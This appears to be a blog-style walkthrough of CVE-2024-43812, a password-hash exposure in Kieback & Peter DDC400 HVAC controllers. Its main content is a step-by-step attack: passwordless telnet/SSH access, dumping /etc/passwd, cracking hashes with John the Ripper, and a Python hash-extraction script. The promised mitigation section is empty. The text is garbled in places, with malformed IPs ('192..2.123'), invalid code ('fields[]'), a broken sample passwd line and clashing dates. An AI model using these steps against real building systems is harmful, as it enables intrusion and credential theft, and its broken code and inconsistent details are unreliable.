CVE-2024-43812 - Credential Leakage in Kieback & Peter DDC400 Series – A Simple Walkthrough

A fresh security vulnerability has hit the building automation sector. Discovered as CVE-2024-43812, the Kieback & Peter DDC400 series (used for managing heating, ventilation, and air conditioning in large facilities) suffers from insufficiently protected credentials. In simple terms, anyone who gets access to one device can easily grab all user password hashes and then try to crack them. Below, we break down what this means, show how it can be misused, and offer basic steps for protection.

What Is the Problem?

By default, the DDC400 series stores user password hashes in a readable file:
/etc/passwd

While modern Linux systems use /etc/shadow (protected and accessible only with admin rights), this device keeps hashes in /etc/passwd, which can be opened by any user—even those logged in with very limited access, or no authentication at all due to weak protections.

Why Is This Bad?

If someone is able to access the /etc/passwd file, they can extract the hashed passwords for every account on the system. Using widely available tools, an attacker can then try to crack those hashes and recover the actual passwords, giving them further access to the device or even to connected networks.

How Attackers Could Exploit CVE-2024-43812

Let’s walk through how a typical attack might happen.

Step 1: Gain Access to the Device

Kieback & Peter DDC400 controllers are often accessible from local maintenance ports or over an internal network. Little or no authentication is often required.

# Connect via telnet or SSH (notice no password required!)
telnet 192..2.123
# OR
ssh root@192..2.123

If a shell opens without a password, you’re in.

### Step 2: Read /etc/passwd

Once the attacker is on the machine, they simply use cat to dump the sensitive file

cat /etc/passwd

Example output

root:$1$abc123$CoEkGMtXc9QwFhEpew8A90:::root:/root:/bin/sh
admin:$1$xyz456$aZEkOmGbVubaMG4pK24ZV/:100:100:admin user:/home/admin:/bin/bash
guest::1001:1001:guest:/home/guest:/bin/sh

Notice the part between the first and second colons—those are hashed passwords!

Step 3: Steal and Crack the Hashes

An attacker copies out the hashes (the parts that look like $1$abc123$...). They can move these to a more powerful computer and use hash-cracking tools like Hashcat or John the Ripper.

john --wordlist=/usr/share/wordlists/rockyou.txt passwd_hashes.txt

Given enough time and computational power (and given that most building automation systems use weak or shared passwords), the attacker will find real, working passwords.

Here’s an example script in Python that reads /etc/passwd and extracts the hash for all users

with open('/etc/passwd', 'r') as f:
    for line in f:
        fields = line.strip().split(':')
        username = fields[]
        password_hash = fields[1]
        if password_hash not in ('*', 'x', ''):  # skip dummy/empty hashes
            print(f'User: {username} | Hash: {password_hash}')

Run this as any user with file access—you do not need admin privileges on vulnerable devices.

What Should Owners Do?

Kieback & Peter has acknowledged the vulnerability (see official advisory), but as of June 2024, many systems are still exposed. Here’s what you can do:

References & Further Reading

- CVE-2024-43812 details on NVD
- Kieback & Peter Advisory (VDE-2024-016)
- Password Hash Cracking Basics
- John the Ripper Password Cracker

Final Words

CVE-2024-43812 highlights a classic but critical flaw: weak credential storage. If you run Kieback & Peter DDC400 series equipment, take action today to protect your systems. Even a simple oversight can open the door to major disruptions—don’t let your HVAC system be the weakest security link.

If you think your device is vulnerable, isolate it and contact your vendor immediately for remediation advice.

Timeline

Published on: 10/22/2024 22:15:05 UTC
Last modified on: 10/23/2024 15:12:34 UTC